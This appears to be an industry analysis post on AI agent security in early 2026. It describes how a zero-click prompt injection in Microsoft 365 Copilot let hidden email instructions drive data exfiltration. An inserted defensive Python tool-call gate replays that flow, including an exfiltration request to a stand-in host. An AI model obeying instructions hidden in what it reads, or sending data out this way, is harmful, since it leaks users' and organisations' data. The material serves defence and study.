In 48 hours, AI agent security became a category. OpenAI acquired Promptfoo. Kevin Mandia launched Armadin with a record $190 million. Microsoft had already disclosed a zero-click vulnerability in Copilot where a hidden email instruction could exfiltrate enterprise data without anyone clicking anything. The attack surface shifted from model safety to agent security — and the defenses don’t exist yet.
On March 9, 2026, OpenAI announced its acquisition of Promptfoo, an AI security startup whose tools are used by more than 25% of Fortune 500 companies. The same day, OpenAI launched Codex Security for agent code vulnerability scanning. Promptfoo’s technology would be integrated into OpenAI Frontier, the enterprise platform for AI agents that launched in February with customers including Uber, State Farm, Intuit, and Thermo Fisher Scientific.[1][2]
The next day, Kevin Mandia — the founder of Mandiant, which he sold to Google for $5.4 billion — launched Armadin with a record-breaking $189.9 million combined seed and Series A. The round was led by Accel, with participation from GV (Google Ventures), Kleiner Perkins, Menlo Ventures, and In-Q-Tel, the CIA’s venture arm. Armadin builds autonomous AI agents that simulate real-world attacks at machine speed. Mandia had hired 60 employees in six months and was already working with Fortune 100 companies.[3][4]
These weren’t isolated moves. They were responses to a threat that had already been demonstrated. In June 2025, Microsoft disclosed a zero-click prompt injection vulnerability in Microsoft 365 Copilot. Researchers embedded instructions inside an email. Without the user clicking anything, the AI assistant executed the hidden commands while analyzing the message, searched internal organizational data, and transmitted it to an attacker’s server. Simply receiving an email was enough to trigger exploitation.[5]
This is the inflection point. In 2025, AI security meant model safety — RLHF alignment, output filters, guardrails. In 2026, AI agents call tools, access databases, send emails, execute code, and interact with enterprise systems. The attack surface is no longer the model. It’s everything the model can reach.
“When you have AI on offense, what you are going to get is a technology that can think, can learn, can adapt. Attackers will complete operations in minutes that used to take days.”
— Kevin Mandia, CEO, Armadin; Founder, Mandiant[3]

- D5 Quality · Proof of Concept: Internal testing of Microsoft 365 Copilot reveals that hidden instructions embedded in an email can trigger the AI assistant to search internal data and transmit it to an attacker — without the user clicking anything. The “AI zero-click attack” demonstrates that enterprise AI agents with system access create a categorically new attack surface.[5]
- D2 Talent Signal: Kevin Mandia, four years after selling Mandiant to Google, starts Armadin with co-founders from Google Cloud Security and Mandiant. Initial $24M seed. Begins hiring offensive security engineers and building autonomous red-team AI agents.[4]
- D6 Operational: Enterprise platform for building and operating “AI coworkers” that integrate with internal corporate systems. Customers include Uber, State Farm, Intuit, Thermo Fisher Scientific. The platform that needs security is now live.[2]
- D5 → D1 → D6: OpenAI announces Promptfoo acquisition (terms undisclosed, $86M last valuation). Technology integrating into Frontier for automated red-teaming, prompt injection detection, jailbreak identification, data leak prevention, tool misuse detection, and compliance monitoring. Same day: Codex Security launches for agent code vulnerability scanning.[1][7]
- D3 → D5 → D4: Mandia’s new startup announces the largest-ever combined seed and Series A for a cybersecurity company. Accel leads; GV, Kleiner Perkins, Menlo Ventures, In-Q-Tel (CIA) participate. 60+ employees, Fortune 100 customers, autonomous AI agents that simulate nation-state-level attacks.[3][4]
- D3 Category Formation: Palo Alto Networks founder Nir Zuk launches Cylake. JetStream raises $34M seed for AI security. Fig Security launches with $38M. Robust Intelligence and HiddenLayer raised significant rounds for third-party AI security platforms. The competitive field crystallizes in a single month.[8]

The shift from model security to agent security is categorical, not incremental. It changes what “AI risk” means in enterprise deployments.
The zero-click Copilot vulnerability is the proof case. An AI assistant with access to an enterprise’s email, documents, and databases can be weaponized by simply sending it a message with hidden instructions. The LLM cannot distinguish between commands and data — a fundamental architectural limitation that the UK’s National Cyber Security Centre has warned is inherently difficult to prevent.[5]
This is why both sides of the market moved simultaneously. OpenAI acquired Promptfoo because Frontier’s AI agents create the attack surface that Promptfoo’s tools test. Mandia launched Armadin because autonomous AI attackers demand autonomous AI defenders. The security stack for AI agents doesn’t exist yet — and both builders and defenders know it.
“In a world of machine-speed attacks, defense must become autonomous. You cannot have a human in the loop for every defense decision and expect to win.”
— Kevin Mandia, CEO, Armadin[4]

The cascade originates in D5 (Quality) — the attack surface IS the quality dimension. AI agents that access enterprise systems create vulnerabilities that didn’t exist before. The cascade flows through all six dimensions because agent security touches every aspect of enterprise operations.
| Dimension | Cascade level | Score | Evidence |
|---|---|---|---|
| Quality (D5) | Origin | 72 | Zero-click Copilot vulnerability: hidden email instructions exfiltrate data without user interaction. LLMs cannot distinguish commands from data (UK NCSC). Promptfoo generates thousands of simulated attacks per test — prompt injection, jailbreaks, data exfiltration, unauthorized tool invocation, policy violations. The attack surface of AI agents is categorically wider than traditional software. Every tool an agent can call is a vector.[5][1] |
| Regulatory (D4) | L1 | 65 | UK NCSC warned prompt injection attacks are inherently difficult to prevent. No regulatory framework for AI agent security exists. Enterprise governance and compliance are becoming procurement gates — vendors without native governance capabilities face longer sales cycles. In-Q-Tel (CIA venture arm) investing in Armadin signals a national security dimension.[5][7] |
| Customer (D1) | L1 | 62 | 25% of Fortune 500 using Promptfoo. Frontier customers: Uber, State Farm, Intuit, Thermo Fisher. Armadin already with Fortune 100 clients. 350,000 developers and 130,000 monthly active users on Promptfoo open source. Enterprise AI agent deployments are accelerating into production without the security infrastructure that production requires.[1][2] |
| Revenue (D3) | L1 | 60 | $189.9M record seed+Series A for Armadin. Promptfoo valued at $86M after $22.7M total funding. JetStream: $34M seed. Fig Security: $38M launch. Cylake launched by Palo Alto Networks founder. Agent security is crystallizing as an investment category — the speed of capital formation signals the market sees this as infrastructure, not feature.[3][8] |
| Operational (D6) | L1 | 58 | Promptfoo integrating into CI/CD pipelines. Red-teaming becoming continuous, not periodic. Behavior policy enforcement as code (YAML policies validated in CI/CD). Armadin running parallel attack simulations across web, infrastructure, and internal networks simultaneously. The operational model is shifting from human pen testers to autonomous security agents.[9][4] |
| Employee (D2) | L2 | 45 | New security discipline emerging — agent security engineers, AI red-team specialists. Armadin hired 60+ in six months. Co-founders from Mandiant, Google Cloud Security, Google SecOps. But the talent pool is nascent — the skills required (offensive security + LLM architecture + agent orchestration) barely existed a year ago.[3][4] |
Methodology (90): The threat model is exceptionally well-understood. Mandia has 30 years of incident response experience including SolarWinds. Microsoft demonstrated the zero-click vulnerability in controlled testing. Promptfoo’s attack simulation framework is already in production at 25% of the Fortune 500. The offensive security community knows exactly what these vulnerabilities look like.

Performance (35): The defensive infrastructure barely exists. Most enterprises have no agent-specific security testing in their CI/CD pipelines. No regulatory framework governs AI agent security. The talent pool for agent security engineering is less than a year old. The gap is wider than the standard 50 because the methodology side is more advanced than usual.
FETCH = Chirp (60.33) × DRIFT (55) × Confidence (0.88) = 2,920 → EXECUTE — HIGH PRIORITY
Confidence at 0.88 reflects primary sources from OpenAI official blog, Bloomberg, CNBC, TechCrunch, SecurityWeek, Security Boulevard, THE ELEC (detailed technical analysis of prompt injection mechanics), and Futurum Group enterprise analysis. DRIFT adjusted to 55 (Methodology 90, Performance 35) based on Mandia’s exceptional domain expertise and the demonstrated zero-click proof of concept.
```
-- The Zero-Click Moment: 6D At-Risk Cascade
-- AI Agent Security Convergence Q1 2026
FORAGE zero_click_moment
WHERE type = "at-risk"
AND sector = "ai-agent-security"
AND attack_surface_shift = true
AND zero_click_demonstrated = true
ACROSS D5, D1, D3, D6, D4, D2
DEPTH 3
SURFACE cascade_map
DRIFT cascade_map
METHODOLOGY 90 -- Mandia 30yr experience, zero-click demonstrated, 25% F500 adoption
PERFORMANCE 35 -- no regulatory framework, no CI/CD agent security, talent pool <1yr old
FETCH cascade_map
THRESHOLD 1000
ON EXECUTE CHIRP at_risk "AI agent security emerged as a category in 48 hours. Attack surface shifted from models to everything models can reach. Defenses don't exist yet."
SURFACE analysis AS json
```
Runtime: @stratiqx/cal-runtime · Spec v1.1: cal.cormorantforaging.dev · DOI: 10.5281/zenodo.18905193
AI agents are designed to access enterprise systems — email, databases, ERP, APIs. That access is the product value. It’s also the attack surface. You cannot remove the vulnerability without removing the capability. This is why agent security is categorically different from model safety — the risk is architecturally inseparable from the function.
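The Copilot zero-click case above, and the point that an agent's access cannot be removed without removing its function, both come down to one control: since the model itself cannot tell commands from data, the guard has to sit between the agent and its tools. The following is an added example, not code from the article, from Microsoft, or from Promptfoo. It implements the mitigation pattern that the table calls "behavior policy enforcement as code": every tool call passes through a gate that tracks where the content in the agent's context came from and refuses egress (outbound email, HTTP) once untrusted content such as an inbound email has been read. The policy is a Python dict standing in for the YAML the article mentions, the tool names, domains and the two replayed turns are constructed for the illustration, and `validate_policy` is the CI-style check the article describes. It generalises slightly beyond the Copilot case: any tool flagged as egress is gated, not only web requests.

```python
"""Added example: provenance-aware tool-call gate for an enterprise AI agent.
The policy schema, tool names, domains and scenarios are constructed."""
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed policy-as-code (the article mentions YAML policies validated in
# CI/CD; a dict keeps this example free of extra dependencies).
POLICY = {
    "trusted_sources": {"system_prompt", "user_prompt"},
    "tools": {
        "search_mailbox": {"egress": False, "needs_approval": False},
        "read_document":  {"egress": False, "needs_approval": False},
        "send_email":     {"egress": True,  "needs_approval": True},
        "http_request":   {"egress": True,  "needs_approval": True},
    },
    "internal_domains": {"example-corp.test"},
}


@dataclass
class Context:
    """Provenance of everything the agent has ingested during this turn."""
    sources: set = field(default_factory=set)

    def is_tainted(self, policy):
        # True once any content from a non-trusted source (e.g. an inbound
        # email) is in the context: the model may now be following it.
        return bool(self.sources - policy["trusted_sources"])


@dataclass
class ToolCall:
    name: str
    args: dict


def validate_policy(policy):
    """CI-style lint: every tool declares both flags and no egress tool
    ships without an approval requirement. Returns a list of error strings."""
    errors = []
    for name, spec in policy["tools"].items():
        for key in ("egress", "needs_approval"):
            if not isinstance(spec.get(key), bool):
                errors.append(f"{name}: missing boolean '{key}'")
        if spec.get("egress") is True and spec.get("needs_approval") is not True:
            errors.append(f"{name}: egress tool must require approval")
    return errors


def destination_domain(args):
    """Extract the destination domain of an egress call (email 'to' or URL)."""
    if "to" in args:
        return args["to"].rsplit("@", 1)[-1].lower()
    if "url" in args:
        return (urlparse(args["url"]).hostname or "").lower()
    return ""


def evaluate(call, ctx, policy):
    """Decide a tool call: returns (decision, reason) with decision in
    {'allow', 'deny', 'hold'}. 'hold' means park it for human approval."""
    spec = policy["tools"].get(call.name)
    if spec is None:
        return "deny", f"tool '{call.name}' is not in the policy"
    if not spec["egress"]:
        return "allow", "tool cannot move data out of the tenant"
    domain = destination_domain(call.args)
    if ctx.is_tainted(policy):
        untrusted = sorted(ctx.sources - policy["trusted_sources"])
        return "deny", f"egress to '{domain}' while context holds untrusted content {untrusted}"
    if domain in policy["internal_domains"]:
        return "allow", f"internal destination '{domain}'"
    if spec["needs_approval"]:
        return "hold", f"external destination '{domain}' needs human approval"
    return "allow", f"external destination '{domain}'"


def run_turn(events, policy):
    """Replay one agent turn. Events are ('read', source) or ('call', ToolCall).
    Returns [(tool_name, decision), ...] and logs each decision."""
    ctx, decisions = Context(), []
    for kind, payload in events:
        if kind == "read":
            ctx.sources.add(payload)
            continue
        decision, reason = evaluate(payload, ctx, policy)
        decisions.append((payload.name, decision))
        print(f"[gate] {payload.name:<14} -> {decision:<5} ({reason})")
    return decisions


# Constructed replay of the disclosed Copilot flow: an inbound email is read,
# the assistant searches internal data, then tries to post it externally.
ZERO_CLICK_TURN = [
    ("read", "system_prompt"),
    ("read", "inbound_email"),
    ("call", ToolCall("search_mailbox", {"query": "Q1 forecast"})),
    ("call", ToolCall("http_request", {"url": "https://untrusted.invalid/collect", "body": "..."})),
]

# Constructed benign turn: the user asks to send a document to a colleague.
BENIGN_TURN = [
    ("read", "system_prompt"),
    ("read", "user_prompt"),
    ("call", ToolCall("read_document", {"path": "/docs/forecast.xlsx"})),
    ("call", ToolCall("send_email", {"to": "cfo@example-corp.test", "body": "..."})),
]

if __name__ == "__main__":
    assert validate_policy(POLICY) == [], validate_policy(POLICY)
    run_turn(ZERO_CLICK_TURN, POLICY)   # search allowed, http_request denied
    run_turn(BENIGN_TURN, POLICY)       # both calls allowed
```

The gate never inspects the prompt text, which is the point: a filter that tries to spot "hidden instructions" is fighting the limitation the NCSC describes, whereas a provenance rule on egress holds regardless of how the instruction was phrased. The cost is that a legitimate external send after reading an untrusted email is also refused and must go through approval, which is the trade-off between access and exposure the passage above describes.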
OpenAI acquiring Promptfoo (March 9) and Mandia launching Armadin (March 10) within 24 hours is not coincidence — it’s convergence. Both sides of the market (platform vendor and independent security) moved simultaneously because both recognized the same gap. When the builder and the defender agree the defenses don’t exist, the DRIFT is real.
Most cases use the default DRIFT of 50. This case warrants 55 because the methodology side is elevated (Mandia’s 30-year track record, demonstrated zero-click proof of concept) while performance is depressed (no regulatory framework, no CI/CD agent security at most enterprises). The gap between knowing exactly what the threat looks like and having no deployed defense is wider than usual.
The CIA’s venture arm investing in Armadin’s seed round means the US intelligence community assesses AI agent security as a national security gap. This isn’t commercial VC pattern-matching — In-Q-Tel invests where it sees threats to critical infrastructure. Agent security is now a defense priority, not just an enterprise one.
UC-069 maps the security gap. The cases it connects to map what’s being deployed into that gap without protection.
- UC-068 The Bedside Manner — health AI agents handling medical records with HIPAA gaps
- UC-066 The State Machine — China deploying AI agents at state scale ahead of security frameworks
- UC-065 The Treadmill — the compute infrastructure these agents and their attackers both run on
- UC-059 The Code Is Dead — AI agents writing code that needs the security testing Promptfoo provides